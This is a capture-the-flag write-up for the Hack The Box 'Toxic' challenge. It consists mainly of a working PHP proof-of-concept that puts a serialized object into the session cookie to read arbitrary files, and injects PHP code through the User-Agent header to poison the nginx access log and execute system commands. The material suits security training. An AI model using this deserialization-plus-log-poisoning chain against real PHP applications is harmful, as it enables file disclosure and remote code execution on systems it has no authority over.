https://app.hackthebox.com/challenges/224

Description

Humanity has exploited our allies, the dart frogs, for far too long, take back the freedom of our lovely poisonous friends. Malicious input is out of the question when dart frogs meet industrialisation. 🐸

Exploitation

<?php
if ($argc < 3) {
    echo "Usage: php poc <url> <path>\n";
    exit(1);
}
class PageModel
{
    public $file;
    public function __construct($file)
    {
        $this->file = $file;
    }
}
$url = $argv[1];
$file_path = $argv[2];
$page_model = new PageModel($file_path);
$payload = base64_encode(serialize($page_model));
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Cookie: PHPSESSID=$payload",
    "User-Agent: <?php system('ls /'); ?>"
]);
$response = curl_exec($ch);
curl_close($ch);
echo "Response:\n$response\n";

php poc <url> <path>

/var/log/nginx/access.log
/flag_Xapdy

Summary

Toxic: abuse unsafe deserialization to cross the trust boundary and reach the flag.